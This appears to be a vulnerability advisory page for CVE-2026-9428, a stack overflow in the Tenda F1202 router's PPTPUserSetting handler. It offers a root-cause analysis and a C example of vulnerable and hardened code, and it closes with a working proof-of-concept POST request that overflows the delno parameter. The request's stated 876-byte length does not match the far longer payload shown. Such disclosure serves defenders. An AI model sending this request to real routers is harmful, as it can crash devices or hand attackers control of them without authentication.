VYPR
Unrated severity · NVD Advisory · Published May 25, 2026

Tenda F1202 PPTPUserSetting fromPPTPUserSetting stack-based overflow

CVE-2026-9428

Description

A vulnerability has been found in Tenda F1202 1.2.0.20(408). The affected function is fromPPTPUserSetting in the file /goform/PPTPUserSetting. Manipulation of the argument delno leads to a stack-based buffer overflow. The attack may be performed from remote. The exploit has been disclosed to the public and may be used.

AI Insight

LLM-synthesized narrative grounded in this CVE's description and references.

Stack-based buffer overflow in Tenda F1202 router's fromPPTPUserSetting function allows remote unauthenticated attackers to cause denial of service or remote code execution.

Vulnerability

A stack-based buffer overflow vulnerability exists in the fromPPTPUserSetting function of the Tenda F1202 router firmware version 1.2.0.20(408). The function processes the delno parameter from a POST request to the /goform/PPTPUserSetting endpoint. The parameter is copied into a stack buffer via sprintf without any length check, leading to a buffer overflow [1].

Exploitation

An attacker can exploit this vulnerability by sending a crafted POST request to the vulnerable endpoint with an excessively long delno value. No authentication is required, as the endpoint is exposed on the router's web interface. The proof-of-concept provided in [1] demonstrates sending a long string of 'a' characters. The attack can be performed remotely over the network.

Impact

Successful exploitation can result in denial of service (crash of the httpd process) or potentially remote code execution with the privileges of the httpd service. An attacker could gain full control over the affected device, leading to complete compromise of network traffic and device functionality [1].

Mitigation

As of the publication date, no official patch has been released by Tenda. Users should monitor the vendor's website [2] for firmware updates. Until a fix is available, restrict access to the router's web interface to trusted networks only and disable remote management features if possible.

AI Insight generated on May 25, 2026. Synthesized from this CVE's description and the cited reference URLs; citations are validated against the source bundle.

Affected products: 1

Patches: 0

No patches discovered yet.

Vulnerability mechanics

Root cause

"Missing length check in `fromPPTPUserSetting` allows unbounded `sprintf` copy of the `delno` parameter into a fixed stack buffer."

Attack vector

An unauthenticated attacker sends a crafted POST request to `/goform/PPTPUserSetting` with an overly long `delno` parameter. The `fromPPTPUserSetting` function copies this value into a stack buffer via `sprintf` without bounds checking, overflowing the buffer [ref_id=1]. The attack is performed remotely over HTTP and requires no prior authentication. The PoC demonstrates sending 876 bytes of 'a' characters in the `delno` field to trigger the overflow [ref_id=1].

Affected code

The vulnerable function is `fromPPTPUserSetting` in the file `/goform/PPTPUserSetting` of the Tenda F1202 firmware version 1.2.0.20(408). The function reads the user-supplied `delno` parameter and passes it through intermediate variables (`s_1`, `s_3`) to `sprintf` without any length check, causing a stack-based buffer overflow on the stack buffer `s__1` [ref_id=1].

What the fix does

No patch is provided in the bundle. The advisory identifies that the root cause is the use of `sprintf` without a length check when copying the `delno` parameter into a stack buffer [ref_id=1]. To remediate, the vendor should replace the unbounded `sprintf` call with a bounded copy function (e.g., `snprintf`) or validate the length of `delno` before copying it to the stack buffer.
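An added C example (not Tenda's code; the buffer name and size, the field layout, and the assumption that `delno` is a numeric slot index are all guesses) showing the unbounded `sprintf` pattern the advisory describes beside a bounded, validating replacement that rejects oversized input before any copy:

```c
#include <ctype.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* Assumed reconstruction of the pattern the advisory describes (buffer name
 * and size are guesses): attacker-controlled delno reaches sprintf with a
 * fixed-size stack buffer and no length check. Never called in this file. */
void delete_user_vulnerable(const char *delno)
{
    char s__1[64];
    sprintf(s__1, "%s", delno);  /* writes past s__1 once delno exceeds 63 bytes */
    (void)s__1;
}

#define DELNO_MAX 8   /* assumption: a user-slot index never needs more digits */

/* Hardened form: validate before copying, copy with a bound, and treat
 * truncation as an error. Returns 0 on success, -1 when delno is rejected. */
int delete_user_hardened(const char *delno, char *out, size_t out_len)
{
    if (delno == NULL || out == NULL || out_len == 0)
        return -1;
    /* Bounded scan: refuses anything longer than DELNO_MAX without walking
     * (or copying) the full attacker-supplied string. */
    const char *end = memchr(delno, '\0', DELNO_MAX + 1);
    if (end == NULL || end == delno)
        return -1;
    for (const char *p = delno; p < end; p++)
        if (!isdigit((unsigned char)*p))
            return -1;               /* delno is an index, so digits only */
    int written = snprintf(out, out_len, "%s", delno);
    if (written < 0 || (size_t)written >= out_len)
        return -1;                   /* would have truncated: fail closed */
    return 0;
}

/* Helper for exercising the handler: builds a constructed delno of `len`
 * copies of `fill` (e.g. 876 x 'a', the shape of the page's PoC). */
int accept_delno_of_length(size_t len, char fill)
{
    char out[16], *delno = malloc(len + 1);
    if (delno == NULL)
        return -1;
    memset(delno, fill, len);
    delno[len] = '\0';
    int rc = delete_user_hardened(delno, out, sizeof out);
    free(delno);
    return rc;
}
```

The hardened handler never touches more than `DELNO_MAX + 1` bytes of the request value, so an 876-byte `delno` is refused at the length check rather than reaching any copy.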

Preconditions

  • Network: the attacker must be able to send HTTP POST requests to the target device on the local network (typically 192.168.x.x).
  • Auth: no authentication is required; the vulnerable endpoint is accessible without valid credentials.

Reproduction

Send the following POST request to the target device:

```
POST /goform/PPTPUserSetting HTTP/1.1
Host: 192.168.6.2
Content-Length: 876

delno=aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa